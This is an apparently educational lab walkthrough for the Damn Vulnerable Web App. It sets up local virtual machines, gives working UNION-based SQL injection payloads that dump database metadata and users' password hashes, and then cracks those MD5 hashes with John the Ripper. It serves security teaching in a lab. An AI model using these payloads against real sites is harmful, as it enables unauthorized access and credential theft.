ComputerSecurityStudent (CSS) [Login] [Join Now]


|SECURITY TOOLS >> Damn Vulnerable Web App >> DVWA v1.0.7 >> Current Page |Views: 371009

(Damn Vulnerable Web App (DVWA): Lesson 6)

{ Manual SQL Injection, John the Ripper }

Section 0. Background Information
  • What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

  • What is SQL Injection Harvesting?
    • SQL Injection Harvesting is where a malicious user supplies SQL statements to render sensitive data such as usernames, passwords, database tables, and more.

  • Pre-Requisite Lab
  • Lab Notes
    • In this lab we will do the following:
      1. We use inject always true SQL statements into the SQL Injection User ID field with security set to low.
      2. We will obtain the username and raw-MD5 password contents from the users table.
      3. We will use John the Ripper to crack the raw-MD5 password HASH for each user.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either expressed or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2012 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit fedora14 Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

 

Section 2: Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine

     

  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

     

 

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes(FYI):
      • As indicated below, my IP address is 192.168.1.106.
      • Please record your IP address.

     

Section 4: Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

 

Section 5: Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 6: Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes(FYI):
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

 

Section 7: Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox

     

  2. Login to DVWA
    • Instructions:
      1. Start up Firefox on BackTrack
      2. Place http://192.168.1.106/dvwa/login.php in the address bar.
        • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      3. Login: admin
      4. Password: password
      5. Click on Login

 

Section 8: Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select "low"
      3. Click Submit

     

Section 9: Manual SQL Injection
  1. SQL Injection Menu
    • Instructions:
      1. Select "SQL Injection" from the left navigation menu.

     

  2. Basic Injection
    • Instructions:
      1. Input "1" into the text box.
      2. Click Submit.
      3. Note, webpage/code is supposed to print ID, First name, and Surname to the screen.
    • Notes(FYI):
      • Below is the PHP select statement that we will be exploiting, specifically $id.
        • $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

     

  3. Always True Scenario
    • Instructions:
      1. Input the below text into the User ID Textbox (See Picture).
        • %' or '0'='0
      2. Click Submit
    • Notes(FYI):
      • In this scenario, we are saying display all record that are false and all records that are true.
        •  %' - Will probably not be equal to anything, and will be false.
        • '0'='0' - Is equal to true, because 0 will always equal 0.
      • Database Statement
        • mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';

     

  4. Display Database Version
    • Instructions:
      1. Input the below text into the User ID Textbox (See Picture).
        • %' or 0=0 union select null, version() #
      2. Click Submit
    • Notes(FYI):
      • Notice in the last displayed line, 5.1.60 is displayed in the surname.
      • This is the version of the mysql database.

     

  5. Display Database User
    • Instructions:
      1. Input the below text into the User ID Textbox (See Picture).
        • %' or 0=0 union select null, user() #
    • Notes(FYI):
      • Notice in the last displayed line, root@localhost is displayed in the surname.
      • This is the name of the database user that executed the behind the scenes PHP code.

     

  6. Display Database Name
    • Instructions:
      1. Input the below text into the User ID Textbox (See Picture).
        • %' or 0=0 union select null, database() #
    • Notes(FYI):
      • Notice in the last displayed line, dvwa is displayed in the surname.
      • This is the name of the database.

     

  7. Display all tables in information_schema
    • Instructions:
      1. Input the below text into the User ID Textbox (See Picture).
        • %' and 1=0 union select null, table_name from information_schema.tables #
      2. Click Submit
    • Notes(FYI):
      • Now we are displaying all the tables in the information_schema database.
      • The INFORMATION_SCHEMA is the information database, the place that stores information about all the other databases that the MySQL server maintains.

     

  8. Display all the user tables in information_schema
    • Instructions:
      1. Input the below text into the User ID Textbox (See Picture).
        • %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
      2. Click Submit
    • Notes(FYI):
      • Now we are displaying all the tables that start with the prefix "user" in the information_schema database.

     

  9. Display all the columns fields in the information_schema user table
    • Instructions:
      1. Input the below text into the User ID Textbox (See Picture).
        • %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
      2. Click Submit
    • Notes(FYI):
      • Now we are displaying all the columns in the users table.
      • Notice there are a user_id, first_name, last_name, user and Password column.

     

  10. Display all the columns field contents in the information_schema user table
    • Instructions:
      1. Input the below text into the User ID Textbox (See Picture).
        • %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
      2. Click Submit
    • Notes(FYI):
      • Now we have successfully displayed all the necessary authentication information into this database.

 

Section 10: Create Password Hash File
  1. Create Password Hash File
    • Instructions:
      1. Highlight both admin and the password hash
      2. Right Click
      3. Copy

     

  2. Open Notepad
    • Instructions:
      1. Applications --> Wine --> Programs --> Accessories --> Notepad

     

  3. Paste in Notepad
    • Instructions:
      1. Edit --> Paste

     

  4. Format in Notepad
    • Instructions:
      1. Place a ":" immediately after admin
      2. Make sure your cursor is immediately after the ":" and hit the delete button.
      3. Now you should see the user admin and the password hash separated by a ":" on the same line.
      4. Cut the username and password combinations for gordonb, 1337, pablo, and smitty from (Section 11, Step 1) and paste in this file as well.

     

  5. Save in Notepad
    • Instructions:
      1. Navigate to --> /pentest/passwords/john
      2. Name the file name --> dvwa_password.txt
      3. Click Save

 

Section 11: Proof of Lab Using John the Ripper
  1. Proof of Lab
    • Instructions:
      1. Bring up a new terminal, see (Section 7, Step 1)
      2. cd /pentest/passwords/john
      3. ./john --format=raw-MD5 dvwa_password.txt
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a <PrtScn>
      2. Paste into a word document
      3. Upload to Moodle

 


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth